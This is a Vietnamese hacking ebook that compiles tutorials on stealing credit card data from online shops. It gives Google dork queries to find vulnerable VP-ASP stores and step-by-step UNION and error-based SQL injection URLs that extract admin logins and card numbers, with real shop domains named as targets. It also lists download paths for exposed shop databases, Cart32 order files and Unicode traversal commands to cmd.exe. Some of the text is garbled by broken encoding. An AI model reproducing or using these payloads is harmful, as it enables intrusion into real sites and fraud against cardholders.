Ebook này được viết ra nhằm mục đích là học hỏi và chia sẽ kiến thức. Email: hieuitpc@yahoo.com Homepage: http://cntt.pro.vn Nội dung của ebook: hai tutorials do hieupc viết và một vài tutorials khác do anh em bằng hữu viết, trong đó có một vài tutorials cũ nhưng cũng rất đáng được đưa vào với mục đích để tham khảo. Hacking Credit Card Version 2.0 --- Written by Hieupc shopdisplayproducts.asp? cat=' Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả lời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card. Nào giờ chúng ta bắt ðầu bắt ðầu nhé. Cách này cũng nhý những cách thông thường là khai thác theo lỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như: OLE DB, JET Database, ASP… Býớc 1: Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good. Từ khoá nên dùng: allinurl:”shopdisplayproducts.asp?id= hoặc allinurl:”shopdisplayproducts.asp?cat=1 hoặc allinurl:”shopdisplayproducts.asp?cat=2…… Search shop theo Domain .com, .net , .biz… : allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat= . Ai biết chấm gì nữa thì thay vào :) Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn. Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack. Býớc 2: Ví dụ: lấy ví dụ là 1 site thế có dạng thế này : http://www.victim.com http://www.victim.com/shopdisplayproducts.asp?id=5 Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5: http://www.victim.com/shopdisplayproducts.asp?id=5' Xem nó có bị lỗi không nào, hic nó không bị lỗi, chỉ thấy thế này: Home Improvement Page 1 of 2 Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem: http://www.victim.com/shopdisplayproducts.asp?id=5' -->>> http://www.victim.com/shopdisplayproducts.asp?cat=5' Uh, nó lỗi ruì kìa: 5' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c. catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467 Okie, tiếp tục nhé, bạn sẽ thêm ðoạn code sau ðây vào: '%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5' Khi thêm xong thì sẽ nhý thế này: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having% 201=1--sp_password và ðýợc thế? này : 5' union select 1 from tbluser"having 1=1--sp_password Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 467 Chú ý nhé các bạn, cái dấu phẩy ( ` ) rất quan trọng, không có là không được. Và cứ thế ta cứ tiếp tục thêm số nhé: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having% 201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3%20from%20tbluser"having %201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3,4%20from% 20tbluser"having%201=1--sp_password Cứ thế mà tiếp tục cho ðến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số. Ở ðây là tới số 47 : http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1--sp_password 3 click to see more 4 22 18 Please review these other products: Nào giờ chúng ta bắt đầu lấy user and pass: · fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn · fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn Sau khi thêm xong ta sẽ được nhý thế này: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1--sp_password Và có được username và password : User: stephenrossi pass: gnilsur Hoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được. http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'% 2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password Ta sẽ có user và pass được gộp chung 1 số: stephenrossi/gnilsur Bước 3: Tìm link admin, thử đánh cái này vào được không nào: http://www.victim.com/shopadmin.asp hic không được rồi. Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: http://www.victim.com/shopadmin1.asp , cũng không được. Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳng qua là thay table thôi. Ta biết table configuration là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate, afftemplateMerchant… Vậy cậu lệnh sẽ thế này: '%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Thay vào ta sẽ được: http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Ta cũng thấy cái bảng: 3 click to see more 4 22 18 Please review these other products: Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong fieldvalue , vì thế ta sẽ đặt fieldvalue vào số 3, hay 4, hay 22 tuỳ các bạn. '%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Sau khi thêm xong ta sẽ được thế này: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh, nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang. Page 1 of 10 Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong fieldvalue , các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp: shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp Nhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link admin shopaddmoretocart.asp http://www.victim.com/shopaddmoretocart.asp This site is reserved for Shop Administrators only. Administrator's Login UserName : Password : Bây giờ lấy username và password ở trên để thay vào. Việc còn lại chắc các bạn biết. THE END Image Field Hacking Credit Card Version 1.0 --- Written by Hieupc Hack Shop VPASP thật sự là như thế nào? ( Cập nhật và được phát triển thêm từ nhiều bài viết hướng dẫn trước đây ) CÁCH THỨ 1: Cái này chắc có lẽ cũng có nhiều bạn biết, nếu mình đoán không lầm thě chỉ có 30 %-50 % member là biết cách này, tuy nhiên mình cũng đưa lên đây cho các bạn chýa biết và các bạn đă biết rùi học hỏi thêm ở mình hoặc góp ý thêm cho mình chỗ nào chưa hoàn chỉnh ! Cách này cũng như những cách thông thường là khai thác theo l ỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như OLE DB, JET Database, ASP… Bước 1: Ðể tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật là hiệu quả. Bước này cũng là bước quan trọng nhất vì không có shop lỗi làm sao hack :)) Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good. Từ khoá nên dùng: allinurl:”shopdisplayproducts.asp?id= hoặc allinurl:”shopdisplayproducts.asp?id=1 hoặc allinurl:”shopdisplayproducts.asp?id=2…… Search shop theo Domain .com, .net , .biz… : allinurl:”.com/shopdisplayproducts.asp?id= ; allinurl:”.net/shopdisplayproducts.asp?id= . Ai biết chấm gì nữa thì thay vào :) Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack. Bây giờ mình lấy ví dụ shop này nhé: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1 Oh, 1 em Uk cực ngon không biết có CC. Bây giờ kiểm tra xem nó lỗi không bằng cách thêm vào dấu phẩy ( ` ) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1' Oh site bị lỗi kìa các bạn : Products Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'. /chris/shop$db.asp, line 868 Bý?c 2: Ta bắt đầu thêm vào đoạn code này : %20union%20%20select%201%20from%20tbluser%27 Vào phía sau link shop nhớ bỏ luôn cái dấu phẩy sau ?id=1 nhé, nếu không là không được đâu đấy. Khi thêm xong link sẽ như thế này: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from% 20tbluser%27 Oh không dụ gì đây :) Products Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /chris/shop$db.asp, line 868 Còn không biết qua bước 3 nữa, nhưng khoan các bạn hãy xem kinh nghiệm của mình đă khi thêm vào dấu phẩy ( ` ) mà nó hiện ra lỗi như vầy: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' '. /product.asp, line 29 Thì các bạn hack theo kiểu hack cũ nhé. Thui bây giờ qua bước 3 nhé, nói nhiều quá :)) Sau khi đă hoàn thành bước 2, bạn sẽ bắt đầu 1 công việc thiêng liêng nhất và cũng là mệt mỏi nhất, không mệt đâu chỉ uể oải 1 tí, đó là thêm số vào code: 1%20union%20%20select%201,2%20from%20tbluser%27 1%20union%20%20select%201,2,3%20from%20tbluser%27 1%20union%20%20select%201,2,3,4%20from%20tbluser%27……… Khi thêm vào thì link sẽ như thế này : http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4%20from% 20tbluser%27 ………… Cứ thêm số tiếp tục nhé, đừng nản lòng hãy cố lên. Cho đến khi nó xuất hiện 1 cái bảng rất đẹp :)) Ái da, mỏi tay quá tới số 34 mới hiện ra cái bảng trời đánh này :)) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser %27 Đây là bước cuối cùng để lấy user and pass: những con số quan trọng của shop naỳ là : 3, 4 , 22. fldusername <~ thay vào số 4 fldpassword <~ thay vào số 22 Sau khi thay xong link sẽ như thế này: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34%20from %20tbluser%27 Và các bạn đã có user and pass rùi đấy: User: admin848 pass: admin848 User: carste pass: carste Phần còn lại là tìm link admin để login, cái này cũng khá quan trọng vì không có link admin làm sao lấy CC :)) Chú ý: link admin để login mặc định của VPASP là : shopadmin.asp cũng có khi ta đánh shopadmin1.asp sẽ vào link admin. CÁCH HACK THỨ 2 RÚT RA TỪ BÀI HƯỚNG DẪN CỦA ANH HAI Silveryhat_Hacker : Bước 1 tương tự như trên: Ví dụ site này: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153' cũng thêm vào dấu phẩy ( ` ) để check lỗi Products Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shopping/shopdisplayproducts.asp, line 93 Oh có lỗi rồi, giờ sao đây :)) Cái này anh em biết khai thác chứ: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20table_name%20from%20information_schema.tables))--sp_password Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 B ước 2 chắc các bạn biết, chỉ là lấy table thui, mình chỉ việc kiếm table nào chưá users của admin là okie. http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('ver_Faq','coupons','customerprices','customers')))--sp_password Products Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 Tới đây là đã quá rõ, cái mình chính là table này : 'AdminUsers' vì sao vậy vì nó chưá user và pass chắc. Thui cứ khai thác thử. Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns% 20where%20table_name=('AdminUsers')))--sp_password Khi thêm code xong sẽ như thế này: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))-- sp_password Products Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93 [...]... 2b'%20email:%20'%2bemail%2b'%20cardnumber:%20'%2bc ardnumber%2b'%20expireymonth:%20'% 2bexpirymonth%2b '%20year:%20'% 2bexpiryyear%20from%20orders)) sp_password lay' cc thu 2 thi ta them vao o sao from orders where cardnumber not in('so card dau tien') va lan luot lay het cac credit card co tren do' nhu cai shop o tren thi de dung cho may bac thuc tap va de co them kinh nghiem ma thoi,vi day chi de hoc hoi,ko nham muc dich pha hoai bat cu ai Hack... met,toi dua luon cho anh em xai choi lay cc dau tien %2bconvert(int,(select%20top%201%20cardtype%2b'%20 Name:'%2bcardname%2b'%20addr:%20'%2baddress% 2b'%20 suburb:%20'% 2bsuburb%2b'%20state:%20'%2bstate%2b'%20zip:%20'%2 bpostcode%2b'%20country:%20'%2bcountry%2b'% 20phone :%20'%2bphone% 2b'%20email:%20'%2bemail%2b'%20cardnumber:%20'%2bc ardnumber%2b'%20expireymonth:%20'% 2bexpirymonth%2b '%20year:%20'%... mua bỏn khụng c bo mt, mó húa hay ct gi cn thn nờn bn hon ton cú th ly chỳng mt cỏch d dng Lu ý: ụi khi vi thc t, 1 s link cú th khỏc i, khụng phi lỳc no cng hon ton ỳng, d liu cú khi bao gm c CRD (Credit Card) nờn mi vic phi qua proxy (nu khụng cú proxy thỡ cú th ra dch v ) Khai thỏc: Hóy s dng 1 trong nhng link sau: www.victim.com/fpdb/shop.mdb www.victim.com/shoponline/fpdb/shop.mdb www.victim.com/database/metacart.mdb... cú th download cc t õy:www.84vn.com/database/metacart.mdb Cú ngha l database khụng h cú 1 chỳt bo mt no c Download vụ t ! Trong database cú th bao gm: name, surname, address, e-mail, phone number, credit card number, company name Bn cú th khai thỏc d liu ny, nhng trong thc t, mi vic khụng phi lỳc no cng suụn s c, bn hóy tng tng mi server cú mt cu trỳc riờng, vớ d nh ng dn khụng phi lỳc no cng l fpdb/... datasources/ hay config/datasources/ Kt qu :ng dn nhng trang b li ny c gỡ ? T õy bn thờm vo expire.mdb vo sau datasources/ hay config/datasources/ Tờn v mt khu : Khụng cn Sau ú : Bón ti c kho d liu cú credit card TUTORIAL BY CVHINT -Lõu ri khụng ghộ qua din n chi s anh em nhNờn tui xin gúp mt bi vit gi l úng gúp cho din n tớ xớu vi li v vic hack tụi s khụng tham gia mt thi gian di nờn vic share ht kinh... file mdb v sau khi download v rựi thỡ chc mi ngi bit phi lm gỡ ri ch Li Cart32.exe: vo google.com ,search t khúa "Cart32.exe v3"u tiờn vohttp://www.sitename.com/cgi-bin/cart32.exe/sitename Ly Credit Cards :http://www.sitename.com/cgi-bin/cart32/sitename-ORDERS.txt hoc :http://www.sitename.com/cgi-bin/cart32/sitename-OUTPUT.txt Hack CC thụng qua li SalesCart Database Storage Insecurity: Tng quỏt:... trang web cú tp tin cart32.exe Bn s nhn c 1 s thụng tin c gỡ ? Cha c gỡ ht Tờn v mt khu : Khụng cn Sau ú ? Gi s bn kim c trang web sau cú li http://www.connectionsmall.com/scripts/cart32.exe/ Bn thay t card3 2.exe bng nhng dũng sau õy : I) %e0%80%af / %e0%80%af / %e0%80%af /winnt/system32/cmd.exe?/c+dir+c:\ II) %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+dir+c:\ III) %c1%9c /winnt/system32/cmd.exe?/c+dir+c:\ . tutorials cũ nhưng cũng rất đáng được đưa vào với mục đích để tham khảo. Hacking Credit Card Version 2.0 --- Written by Hieupc shopdisplayproducts.asp? cat='. những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card. Nào giờ chúng ta bắt ðầu bắt ðầu nhé. Cách này cũng nhý những